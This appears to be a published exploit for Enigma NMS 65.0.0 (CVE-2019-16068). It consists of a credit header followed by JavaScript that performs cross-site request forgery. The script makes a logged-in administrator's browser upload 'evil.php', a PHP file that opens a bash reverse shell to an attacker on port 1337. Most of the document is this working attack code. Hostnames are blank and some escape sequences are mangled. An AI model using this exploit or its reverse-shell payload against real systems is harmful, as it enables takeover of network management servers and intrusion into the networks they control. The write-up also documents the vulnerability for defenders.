Enigma NMS 65.0.0 – Cross-Site Request Forgery

#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS Cross-Site Request Forgery (CSRF)        #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16068                                            #   
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#
        _  _
  ___ (~ )( ~)
 /   _ / /   
|   D_ ] /        -= Enigma CSRF by @xerubus =-       
|   D _]/      -= We all have something to hide =-
 ___/ / / 
      (_ )( _)
      @Xerubus    

The following CSRF will create a PHP file for executing a reverse shell on port 1337 via the user upload functionality within the NMS web application.


  history.pushState('', '', '/')
  
    function submitRequest()
    {
      var xhr = new XMLHttpRequest();
      xhr.open("POST", "http:///cgi-bin/protected/manage_files.cgi", true);
      xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
      xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
      xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------208051173310446317141640314495");
      xhr.withCredentials = true;

      var body = "-----------------------------208051173310446317141640314495rn" + 
        "Content-Disposition: form-data; name="action"rn" + 
        "rn" + 
        "system_upgradern" + 
        "-----------------------------208051173310446317141640314495rn" + 
        "Content-Disposition: form-data; name="action_aux"rn" + 
        "rn" + 
        "upload_file_completern" + 
        "-----------------------------208051173310446317141640314495rn" + 
        "Content-Disposition: form-data; name="upfile"; filename="evil.php"rn" + 
        "Content-Type: application/x-phprn" + 
        "rn" + 
        "x3c?phpn" + 
        "n" + 
        "exec("/bin/bash -c 'bash -i x3e& /dev/tcp//1337 0x3e&1'");n" + 
        "n" + 
        "?x3en" + 
        "rn" + 
        "-----------------------------208051173310446317141640314495rn" + 
        "Content-Disposition: form-data; name="upfile_name"rn" + 
        "rn" + 
        "evil.phprn" + 
        "-----------------------------208051173310446317141640314495--rn";

      var aBody = new Uint8Array(body.length);
      for (var i = 0; i < aBody.length; i++)
        aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
    }
    submitRequest();
    window.location='http:///cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser';
  
  
  

            

Comments are closed.